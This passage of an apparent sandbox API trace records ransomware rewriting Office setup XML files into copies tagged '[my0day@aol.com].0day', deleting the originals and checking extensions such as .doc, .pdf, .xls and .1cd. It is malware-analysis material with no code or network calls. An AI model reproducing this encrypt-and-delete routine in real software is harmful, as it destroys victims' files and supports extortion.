dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1f4 [0039.582] GetLastError () returned 0x0 [0039.582] ReadFile (in: hFile=0x198, lpBuffer=0x3270020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2b1fed4, lpOverlapped=0x0 | out: lpBuffer=0x3270020*, lpNumberOfBytesRead=0x2b1fed4*=0x10b2, lpOverlapped=0x0) returned 1 [0039.871] WriteFile (in: hFile=0x1f4, lpBuffer=0x3270020*, nNumberOfBytesToWrite=0x10c0, lpNumberOfBytesWritten=0x2b1fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3270020*, lpNumberOfBytesWritten=0x2b1fc9c*=0x10c0, lpOverlapped=0x0) returned 1 [0039.872] ReadFile (in: hFile=0x198, lpBuffer=0x3270020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2b1fed4, lpOverlapped=0x0 | out: lpBuffer=0x3270020*, lpNumberOfBytesRead=0x2b1fed4*=0x0, lpOverlapped=0x0) returned 1 [0039.872] WriteFile (in: hFile=0x1f4, lpBuffer=0x3270020*, nNumberOfBytesToWrite=0xf0, lpNumberOfBytesWritten=0x2b1fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3270020*, lpNumberOfBytesWritten=0x2b1fc9c*=0xf0, lpOverlapped=0x0) returned 1 [0039.872] SetEndOfFile (hFile=0x1f4) returned 1 [0039.872] CloseHandle (hObject=0x1f4) returned 1 [0039.873] SetFilePointerEx (in: hFile=0x198, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2b1fec8 | out: lpNewFilePointer=0x0) returned 1 [0039.873] SetEndOfFile (hFile=0x198) returned 1 [0039.874] CloseHandle (hObject=0x198) returned 1 [0039.874] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office32.WW\\Office32WW.XML.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x20) returned 1 [0039.874] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office32.WW\\Office32WW.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office32.ww\\office32ww.xml")) returned 1 [0039.875] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office32.WW\\Office32WW.XML") returned 106 [0039.875] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office32.WW\\Office32WW.XML") returned 106 [0039.875] lstrlenW (lpString=".doc") returned 4 [0039.875] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1 [0039.875] lstrlenW (lpString=".docx") returned 5 [0039.875] lstrcmpiW (lpString1=".docx", lpString2="W.XML") returned -1 [0039.875] lstrlenW (lpString=".pdf") returned 4 [0039.875] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1 [0039.875] lstrlenW (lpString=".xls") returned 4 [0039.875] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1 [0039.875] lstrlenW (lpString=".xlsx") returned 5 [0039.875] lstrcmpiW (lpString1=".xlsx", lpString2="W.XML") returned -1 [0039.875] lstrlenW (lpString=".ppt") returned 4 [0039.875] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1 [0039.875] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office32.WW\\Office32WW.XML") returned 106 [0039.875] lstrlenW (lpString=".zip") returned 4 [0039.875] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1 [0039.875] lstrlenW (lpString=".rar") returned 4 [0039.875] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1 [0039.875] lstrlenW (lpString=".bz2") returned 4 [0039.875] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1 [0039.875] lstrlenW (lpString=".7z") returned 3 [0039.875] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1 [0039.875] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office32.WW\\Office32WW.XML") returned 106 [0039.875] lstrlenW (lpString=".dbf") returned 4 [0039.875] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1 [0039.875] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office32.WW\\Office32WW.XML") returned 106 [0039.875] lstrlenW (lpString=".1cd") returned 4 [0039.875] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1 [0039.875] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office32.WW\\Office32WW.XML") returned 106 [0039.876] lstrlenW (lpString=".jpg") returned 4 [0039.876] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1 [0039.876] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office32.WW\\Office32WW.XML") returned 106 [0039.876] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office32.WW\\Office32WW.XML") returned 106 [0039.876] lstrlenW (lpString=".doc") returned 4 [0039.876] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1 [0039.876] lstrlenW (lpString=".docx") returned 5 [0039.876] lstrcmpiW (lpString1=".docx", lpString2="W.XML") returned -1 [0039.876] lstrlenW (lpString=".pdf") returned 4 [0039.876] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1 [0039.876] lstrlenW (lpString=".xls") returned 4 [0039.876] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1 [0039.876] lstrlenW (lpString=".xlsx") returned 5 [0039.876] lstrcmpiW (lpString1=".xlsx", lpString2="W.XML") returned -1 [0039.876] lstrlenW (lpString=".ppt") returned 4 [0039.876] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1 [0039.876] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office32.WW\\Office32WW.XML") returned 106 [0039.876] lstrlenW (lpString=".zip") returned 4 [0039.876] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1 [0039.876] lstrlenW (lpString=".rar") returned 4 [0039.876] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1 [0039.876] lstrlenW (lpString=".bz2") returned 4 [0039.876] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1 [0039.876] lstrlenW (lpString=".7z") returned 3 [0039.876] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1 [0039.876] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office32.WW\\Office32WW.XML") returned 106 [0039.876] lstrlenW (lpString=".dbf") returned 4 [0039.876] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1 [0039.876] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office32.WW\\Office32WW.XML") returned 106 [0039.876] lstrlenW (lpString=".1cd") returned 4 [0039.876] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1 [0039.876] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office32.WW\\Office32WW.XML") returned 106 [0039.876] lstrlenW (lpString=".jpg") returned 4 [0039.877] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1 [0039.877] lstrcmpiW (lpString1=".XML", lpString2=".0day") returned 1 [0039.877] lstrlenW (lpString="OneNoteMUI.XML") returned 14 [0039.877] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\OneNote.en-us\\OneNoteMUI.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\onenote.en-us\\onenotemui.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x198 [0039.877] GetFileSizeEx (in: hFile=0x198, lpFileSize=0x2b1ff1c | out: lpFileSize=0x2b1ff1c*=1606) returned 1 [0039.877] CloseHandle (hObject=0x198) returned 1 [0039.877] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\OneNote.en-us\\OneNoteMUI.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\onenote.en-us\\onenotemui.xml")) returned 0x20 [0039.877] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\OneNote.en-us\\OneNoteMUI.XML.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\onenote.en-us\\onenotemui.xml.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0039.877] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\OneNote.en-us\\OneNoteMUI.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\onenote.en-us\\onenotemui.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x198 [0039.878] SetFilePointerEx (in: hFile=0x198, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2b1fec8 | out: lpNewFilePointer=0x0) returned 1 [0039.878] SetFilePointerEx (in: hFile=0x198, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2b1fec8 | out: lpNewFilePointer=0x0) returned 1 [0039.878] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\OneNote.en-us\\OneNoteMUI.XML.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\onenote.en-us\\onenotemui.xml.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1f8 [0040.045] GetLastError () returned 0x0 [0040.045] ReadFile (in: hFile=0x198, lpBuffer=0x3270020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2b1fed4, lpOverlapped=0x0 | out: lpBuffer=0x3270020*, lpNumberOfBytesRead=0x2b1fed4*=0x646, lpOverlapped=0x0) returned 1 [0040.106] WriteFile (in: hFile=0x1f8, lpBuffer=0x3270020*, nNumberOfBytesToWrite=0x650, lpNumberOfBytesWritten=0x2b1fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3270020*, lpNumberOfBytesWritten=0x2b1fc9c*=0x650, lpOverlapped=0x0) returned 1 [0040.107] ReadFile (in: hFile=0x198, lpBuffer=0x3270020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2b1fed4, lpOverlapped=0x0 | out: lpBuffer=0x3270020*, lpNumberOfBytesRead=0x2b1fed4*=0x0, lpOverlapped=0x0) returned 1 [0040.107] WriteFile (in: hFile=0x1f8, lpBuffer=0x3270020*, nNumberOfBytesToWrite=0xf0, lpNumberOfBytesWritten=0x2b1fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3270020*, lpNumberOfBytesWritten=0x2b1fc9c*=0xf0, lpOverlapped=0x0) returned 1 [0040.107] SetEndOfFile (hFile=0x1f8) returned 1 [0040.108] CloseHandle (hObject=0x1f8) returned 1 [0040.108] SetFilePointerEx (in: hFile=0x198, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2b1fec8 | out: lpNewFilePointer=0x0) returned 1 [0040.108] SetEndOfFile (hFile=0x198) returned 1 [0040.109] CloseHandle (hObject=0x198) returned 1 [0040.109] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\OneNote.en-us\\OneNoteMUI.XML.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x20) returned 1 [0040.109] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\OneNote.en-us\\OneNoteMUI.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\onenote.en-us\\onenotemui.xml")) returned 1 [0040.116] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\OneNote.en-us\\OneNoteMUI.XML") returned 108 [0040.116] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\OneNote.en-us\\OneNoteMUI.XML") returned 108 [0040.116] lstrlenW (lpString=".doc") returned 4 [0040.116] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1 [0040.116] lstrlenW (lpString=".docx") returned 5 [0040.116] lstrcmpiW (lpString1=".docx", lpString2="I.XML") returned -1 [0040.116] lstrlenW (lpString=".pdf") returned 4 [0040.116] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1 [0040.116] lstrlenW (lpString=".xls") returned 4 [0040.116] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1 [0040.116] lstrlenW (lpString=".xlsx") returned 5 [0040.116] lstrcmpiW (lpString1=".xlsx", lpString2="I.XML") returned -1 [0040.116] lstrlenW (lpString=".ppt") returned 4 [0040.116] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1 [0040.116] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\OneNote.en-us\\OneNoteMUI.XML") returned 108 [0040.116] lstrlenW (lpString=".zip") returned 4 [0040.116] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1 [0040.116] lstrlenW (lpString=".rar") returned 4 [0040.116] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1 [0040.117] lstrlenW (lpString=".bz2") returned 4 [0040.117] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1 [0040.117] lstrlenW (lpString=".7z") returned 3 [0040.117] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1 [0040.117] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\OneNote.en-us\\OneNoteMUI.XML") returned 108 [0040.117] lstrlenW (lpString=".dbf") returned 4 [0040.117] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1 [0040.117] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\OneNote.en-us\\OneNoteMUI.XML") returned 108 [0040.117] lstrlenW (lpString=".1cd") returned 4 [0040.117] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1 [0040.117] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\OneNote.en-us\\OneNoteMUI.XML") returned 108 [0040.117] lstrlenW (lpString=".jpg") returned 4 [0040.117] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1 [0040.117] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\OneNote.en-us\\OneNoteMUI.XML") returned 108 [0040.117] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\OneNote.en-us\\OneNoteMUI.XML") returned 108 [0040.117] lstrlenW (lpString=".doc") returned 4 [0040.117] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1 [0040.117] lstrlenW (lpString=".docx") returned 5 [0040.117] lstrcmpiW (lpString1=".docx", lpString2="I.XML") returned -1 [0040.117] lstrlenW (lpString=".pdf") returned 4 [0040.117] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1 [0040.117] lstrlenW (lpString=".xls") returned 4 [0040.117] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1 [0040.117] lstrlenW (lpString=".xlsx") returned 5 [0040.117] lstrcmpiW (lpString1=".xlsx", lpString2="I.XML") returned -1 [0040.117] lstrlenW (lpString=".ppt") returned 4 [0040.117] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1 [0040.117] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\OneNote.en-us\\OneNoteMUI.XML") returned 108 [0040.117] lstrlenW (lpString=".zip") returned 4 [0040.117] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1 [0040.117] lstrlenW (lpString=".rar") returned 4 [0040.117] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1 [0040.117] lstrlenW (lpString=".bz2") returned 4 [0040.117] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1 [0040.118] lstrlenW (lpString=".7z") returned 3 [0040.118] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1 [0040.118] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\OneNote.en-us\\OneNoteMUI.XML") returned 108 [0040.118] lstrlenW (lpString=".dbf") returned 4 [0040.118] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1 [0040.118] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\OneNote.en-us\\OneNoteMUI.XML") returned 108 [0040.118] lstrlenW (lpString=".1cd") returned 4 [0040.118] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1 [0040.118] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\OneNote.en-us\\OneNoteMUI.XML") returned 108 [0040.118] lstrlenW (lpString=".jpg") returned 4 [0040.118] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1 [0040.118] lstrcmpiW (lpString1=".XML", lpString2=".0day") returned 1 [0040.118] lstrlenW (lpString="PrjProrWW.XML") returned 13 [0040.118] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PRJPROR\\PrjProrWW.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\prjpror\\prjprorww.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x200 [0040.119] GetFileSizeEx (in: hFile=0x200, lpFileSize=0x2b1ff1c | out: lpFileSize=0x2b1ff1c*=6421) returned 1 [0040.119] CloseHandle (hObject=0x200) returned 1 [0040.119] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PRJPROR\\PrjProrWW.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\prjpror\\prjprorww.xml")) returned 0x20 [0040.119] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PRJPROR\\PrjProrWW.XML.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\prjpror\\prjprorww.xml.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0040.119] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PRJPROR\\PrjProrWW.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\prjpror\\prjprorww.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x200 [0040.120] SetFilePointerEx (in: hFile=0x200, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2b1fec8 | out: lpNewFilePointer=0x0) returned 1 [0040.120] SetFilePointerEx (in: hFile=0x200, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2b1fec8 | out: lpNewFilePointer=0x0) returned 1 [0040.120] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PRJPROR\\PrjProrWW.XML.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\prjpror\\prjprorww.xml.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x204 [0040.120] GetLastError () returned 0x0 [0040.120] ReadFile (in: hFile=0x200, lpBuffer=0x3270020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2b1fed4, lpOverlapped=0x0 | out: lpBuffer=0x3270020*, lpNumberOfBytesRead=0x2b1fed4*=0x1915, lpOverlapped=0x0) returned 1 [0040.122] WriteFile (in: hFile=0x204, lpBuffer=0x3270020*, nNumberOfBytesToWrite=0x1920, lpNumberOfBytesWritten=0x2b1fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3270020*, lpNumberOfBytesWritten=0x2b1fc9c*=0x1920, lpOverlapped=0x0) returned 1 [0040.123] ReadFile (in: hFile=0x200, lpBuffer=0x3270020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2b1fed4, lpOverlapped=0x0 | out: lpBuffer=0x3270020*, lpNumberOfBytesRead=0x2b1fed4*=0x0, lpOverlapped=0x0) returned 1 [0040.123] WriteFile (in: hFile=0x204, lpBuffer=0x3270020*, nNumberOfBytesToWrite=0xee, lpNumberOfBytesWritten=0x2b1fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3270020*, lpNumberOfBytesWritten=0x2b1fc9c*=0xee, lpOverlapped=0x0) returned 1 [0040.123] SetEndOfFile (hFile=0x204) returned 1 [0040.123] CloseHandle (hObject=0x204) returned 1 [0040.123] SetFilePointerEx (in: hFile=0x200, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2b1fec8 | out: lpNewFilePointer=0x0) returned 1 [0040.124] SetEndOfFile (hFile=0x200) returned 1 [0040.124] CloseHandle (hObject=0x200) returned 1 [0040.124] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PRJPROR\\PrjProrWW.XML.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x20) returned 1 [0040.125] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PRJPROR\\PrjProrWW.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\prjpror\\prjprorww.xml")) returned 1 [0040.125] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PRJPROR\\PrjProrWW.XML") returned 101 [0040.125] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PRJPROR\\PrjProrWW.XML") returned 101 [0040.125] lstrlenW (lpString=".doc") returned 4 [0040.125] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1 [0040.125] lstrlenW (lpString=".docx") returned 5 [0040.125] lstrcmpiW (lpString1=".docx", lpString2="W.XML") returned -1 [0040.125] lstrlenW (lpString=".pdf") returned 4 [0040.125] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1 [0040.125] lstrlenW (lpString=".xls") returned 4 [0040.125] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1 [0040.125] lstrlenW (lpString=".xlsx") returned 5 [0040.125] lstrcmpiW (lpString1=".xlsx", lpString2="W.XML") returned -1 [0040.125] lstrlenW (lpString=".ppt") returned 4 [0040.125] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1 [0040.125] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PRJPROR\\PrjProrWW.XML") returned 101 [0040.125] lstrlenW (lpString=".zip") returned 4 [0040.125] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1 [0040.125] lstrlenW (lpString=".rar") returned 4 [0040.125] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1 [0040.125] lstrlenW (lpString=".bz2") returned 4 [0040.125] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1 [0040.125] lstrlenW (lpString=".7z") returned 3 [0040.125] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1 [0040.125] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PRJPROR\\PrjProrWW.XML") returned 101 [0040.125] lstrlenW (lpString=".dbf") returned 4 [0040.125] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1 [0040.125] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PRJPROR\\PrjProrWW.XML") returned 101 [0040.125] lstrlenW (lpString=".1cd") returned 4 [0040.126] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1 [0040.126] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PRJPROR\\PrjProrWW.XML") returned 101 [0040.126] lstrlenW (lpString=".jpg") returned 4 [0040.126] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1 [0040.126] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PRJPROR\\PrjProrWW.XML") returned 101 [0040.126] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PRJPROR\\PrjProrWW.XML") returned 101 [0040.126] lstrlenW (lpString=".doc") returned 4 [0040.126] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1 [0040.126] lstrlenW (lpString=".docx") returned 5 [0040.126] lstrcmpiW (lpString1=".docx", lpString2="W.XML") returned -1 [0040.126] lstrlenW (lpString=".pdf") returned 4 [0040.126] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1 [0040.126] lstrlenW (lpString=".xls") returned 4 [0040.126] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1 [0040.126] lstrlenW (lpString=".xlsx") returned 5 [0040.126] lstrcmpiW (lpString1=".xlsx", lpString2="W.XML") returned -1 [0040.126] lstrlenW (lpString=".ppt") returned 4 [0040.126] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1 [0040.126] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PRJPROR\\PrjProrWW.XML") returned 101 [0040.126] lstrlenW (lpString=".zip") returned 4 [0040.126] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1 [0040.126] lstrlenW (lpString=".rar") returned 4 [0040.126] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1 [0040.126] lstrlenW (lpString=".bz2") returned 4 [0040.126] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1 [0040.126] lstrlenW (lpString=".7z") returned 3 [0040.126] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1 [0040.126] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PRJPROR\\PrjProrWW.XML") returned 101 [0040.126] lstrlenW (lpString=".dbf") returned 4 [0040.126] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1 [0040.126] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PRJPROR\\PrjProrWW.XML") returned 101 [0040.126] lstrlenW (lpString=".1cd") returned 4 [0040.126] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1 [0040.126] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PRJPROR\\PrjProrWW.XML") returned 101 [0040.127] lstrlenW (lpString=".jpg") returned 4 [0040.127] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1 [0040.127] lstrcmpiW (lpString1=".XML", lpString2=".0day") returned 1 [0040.127] lstrlenW (lpString="SETUP.XML") returned 9 [0040.127] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PRJPROR\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\prjpror\\setup.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x200 [0040.128] GetFileSizeEx (in: hFile=0x200, lpFileSize=0x2b1ff1c | out: lpFileSize=0x2b1ff1c*=16683) returned 1 [0040.128] CloseHandle (hObject=0x200) returned 1 [0040.128] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PRJPROR\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\prjpror\\setup.xml")) returned 0x20 [0040.128] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PRJPROR\\SETUP.XML.id-9C354B42.[my0day@aol.com].0day" (normalized: 